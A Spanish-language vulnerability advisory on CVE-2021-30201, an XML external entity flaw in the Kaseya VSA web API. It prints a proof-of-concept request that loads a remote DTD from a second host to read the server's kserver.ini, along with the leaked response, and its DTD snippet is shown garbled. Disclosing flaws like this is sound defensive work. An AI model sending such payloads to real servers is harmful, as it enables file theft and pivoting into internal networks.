Vulnerabilidad en Kaseya VSA (CVE-2021-30201)

La API /vsaWS/KaseyaWS.asmx puede utilizarse para enviar XML al sistema. Cuando este XML es procesado (externo) las entidades son procesadas y obtenidas de forma insegura por el sistema y devueltas al atacante. Descripción detallada Dada la siguiente petición: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob. dtd"><data>&send;</data> ``` Y el siguiente archivo XML alojado en http://192.168.1.170/oob.dtd: ``` "> %eval; %error; ``` El servidor obtendrá este archivo XML y lo procesará, leerá el archivo c:\kaseya\kserver\kserver.ini y devolverá el contenido en la respuesta del servidor como se indica a continuación. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerEl servidor no pudo procesar la solicitud. ---Hay un error en el documento XML (24, -1000): Identificador de fragmento '######################################################################## # Este es el archivo de configuración para el KServer. # Colóquelo en el mismo directorio que el ejecutable del KServer # Una línea en blanco o una nueva cabecera de sección válida [] termina cada sección. # Las líneas de comentario comienzan con ; o # ######################################################################## ``` Problemas de seguridad descubiertos --- * La API resuelve de forma insegura entidades XML externas * La API tiene una respuesta de error demasiado verbosa Impacto --- Usando esta vulnerabilidad un atacante puede leer cualquier archivo en el servidor que el proceso del servidor web pueda leer. Además, puede ser utilizado para realizar solicitudes HTTP(s) en la red local y así utilizar el sistema Kaseya para pivotar en la red local